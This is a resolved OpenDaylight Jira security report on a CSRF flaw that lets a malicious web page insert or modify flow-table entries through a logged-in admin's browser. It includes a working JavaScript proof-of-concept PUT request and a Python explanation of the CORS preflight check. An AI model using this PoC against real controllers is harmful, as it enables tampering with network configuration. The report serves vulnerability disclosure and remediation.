[AAA-197] [CSRF] Attacker can insert or modify the entry of flow table Created: 06/Mar/20  Updated: 06/Jul/22  Resolved: 06/Jul/22

Status: Resolved
Project: aaa
Component/s: General
Affects Version/s: Sodium SR1
Fix Version/s: 0.16.0

Type: Bug Priority: High
Reporter: Seongil Wi Assignee: Robert Varga
Resolution: Duplicate Votes: 0
Labels: None
Remaining Estimate: 4 hours
Time Spent: Not Specified
Original Estimate: 4 hours
Environment:

Browsers Verified In:

  • [Firefox 71.0]

Attachments: PNG File 스크린샷 2020-03-06 오후 2.44.48.png    
Issue Links:
Duplicate
duplicates AAA-213 Remove CORS filter from shiro-impl Resolved

Description

Brief of this vulnerability

An attacker can insert or modify an entry of the flow table. This attack was verified on Sodium-SR1. Although not tested in other versions, it is expected to be applicable.

Description

Hi, I found a CSRF bug in flow table insertion and modification. It can be dangerous for the admin. The victim admin can insert the attacker's intended flow into the flow table.

The CSRF PoC is below:

<meta charset="utf-8">
<script src="http://code.jquery.com/jquery-latest.min.js"></script>

<script type="text/javascript">
var createCORSRequest = function(method, url) {
  var xhr = new XMLHttpRequest();
  if ("withCredentials" in xhr) {
    // Most browsers.
    xhr.open(method, url, true);
  } else if (typeof XDomainRequest != "undefined") {
    // IE8 & IE9
    xhr = new XDomainRequest();
    xhr.open(method, url);
  } else {
    // CORS not supported.
    xhr = null;
  }
  return xhr;
};

// RESTCONF config endpoint for flow 1 in table 0 of openflow:1 on the local controller.
var url = 'http://127.0.0.1:8181/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/0/flow/1';
var method = 'PUT';
var xhr = createCORSRequest(method, url);

xhr.onload = function() {
  // Success code goes here.
};

xhr.onerror = function() {
  // Error code goes here.
};

// The cross-origin PUT carries the logged-in admin's session because withCredentials is set;
// the browser only lets it through because the controller's CORS filter permits it.
xhr.setRequestHeader('Content-Type', 'application/xml');
xhr.withCredentials = true;
xhr.send('<?xml version="1.0" encoding="UTF-8" standalone="no"?><flow xmlns="urn:opendaylight:flow:inventory"><priority>4</priority><flow-name>asdfa</flow-name><match><ethernet-match><ethernet-type><type>2048</type></ethernet-type></ethernet-match><ipv4-destination>10.0.0.1/24</ipv4-destination></match><id>1</id><table_id>0</table_id><instructions><instruction><order>0</order><apply-actions><action><order>0</order><dec-nw-ttl/></action></apply-actions></instruction></instructions></flow>');

</script>

This attack is an example because ODL itself is vulnerable to CSRF attacks.

In fact, for any function that configures the ODL controller using the REST API, we can make arbitrary malicious settings using a CSRF attack.

If an administrator accesses an arbitrary web page created by an attacker, Floodlight can be configured with arbitrary settings.

To Reproduce:

  1. Administrator's benign access
  2. Administrator logged in to the dlux gui via the browser with admin account
  3. Administrator accesses ODL controller using REST API in browser with admin account
  4. Administrator visits the malicious webpage

Solution:

  • Check CSRF tokens in all requests.

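The browser-side CORS decision that makes the PoC above go through, as an added Python example (not from the report and not ODL code): it evaluates a preflight response the way a browser does for the PoC's credentialed cross-origin PUT with an application/xml body, and contrasts a constructed origin-echoing CORS filter with emitting no CORS headers at all, which is what the AAA-213 fix amounts to. The attacker origin and both header sets are constructed.

```python
"""Browser-side CORS decision for the credentialed cross-origin PUT in the PoC.
Added example, not ODL code; header sets below are constructed."""
SAFELISTED = {"accept", "accept-language", "content-language", "content-type"}
SIMPLE_CT = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}

def is_simple_header(name, value):
    """Safelisted name, and for Content-Type also a form-style value."""
    n = name.lower()
    if n not in SAFELISTED:
        return False
    return n != "content-type" or value.split(";")[0].strip().lower() in SIMPLE_CT

def needs_preflight(method, req_headers):
    """PUT, or a body type like application/xml, forces an OPTIONS preflight."""
    return method.upper() not in {"GET", "HEAD", "POST"} or not all(
        is_simple_header(n, v) for n, v in req_headers.items())

def cors_allows(origin, method, req_headers, preflight, with_credentials=True):
    """Return (allowed, reason), evaluating the preflight response as a browser does."""
    h = {k.lower(): v for k, v in preflight.items()}
    acao = h.get("access-control-allow-origin")
    if acao is None:
        return False, "no Access-Control-Allow-Origin header: browser blocks the request"
    if with_credentials and acao == "*":
        return False, "wildcard origin is rejected for credentialed requests"
    if with_credentials and h.get("access-control-allow-credentials", "").lower() != "true":
        return False, "server did not allow credentials"
    if acao not in ("*", origin):
        return False, f"origin {origin} not allowed"
    if needs_preflight(method, req_headers):
        methods = {m.strip().upper() for m in h.get("access-control-allow-methods", "").split(",")}
        allowed = {x.strip().lower() for x in h.get("access-control-allow-headers", "").split(",")}
        if method.upper() not in methods:
            return False, f"method {method} not allowed by preflight"
        for n, v in req_headers.items():
            if not is_simple_header(n, v) and n.lower() not in allowed:
                return False, f"header {n} not allowed by preflight"
    return True, "browser sends the request with the victim's session cookie"

# Constructed inputs mirroring the PoC: PUT + application/xml from a page on an
# attacker-controlled origin (placeholder hostname).
ATTACKER_ORIGIN = "https://attacker.example"
POC_HEADERS = {"Content-Type": "application/xml"}
ECHOING_CORS_FILTER = {  # constructed: echoes any Origin and allows credentials
    "Access-Control-Allow-Origin": ATTACKER_ORIGIN,
    "Access-Control-Allow-Credentials": "true",
    "Access-Control-Allow-Methods": "GET, POST, PUT, DELETE, OPTIONS",
    "Access-Control-Allow-Headers": "Content-Type, Authorization",
}
NO_CORS_FILTER = {}  # after AAA-213: no CORS headers are emitted at all
```

With the echoing filter `cors_allows(ATTACKER_ORIGIN, "PUT", POC_HEADERS, ECHOING_CORS_FILTER)` reports the request as allowed; with `NO_CORS_FILTER` the browser blocks it before the flow is written.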

Comments
Comment by Robert Varga [ 23/Apr/20 ]

I think it is AAA's job to secure the HTTP endpoints. Unfortunately I do not remember the details anymore

Comment by Robert Varga [ 23/Apr/20 ]

So if I am reading this correctly, the problem is the CORS filter configuration dating back all the way back to https://git.opendaylight.org/gerrit/c/aaa/+/12533 ... now the next step is to understand the threat model used in those things.

Comment by Robert Varga [ 08/Dec/21 ]

So here I think we need to tighten our policy, but let it still be configurable.

The CORS filter was added to allow easy embedding of RESTCONF requests into portals – which I do not think is being used anymore.

Comment by Robert Varga [ 06/Jul/22 ]

Fixed by removing the CORS filter in AAA-213.

Generated at Wed Feb 07 19:08:53 UTC 2024 using Jira 8.20.10#820010-sha1:ace47f9899e9ee25d7157d59aa17ab06aee30d3d.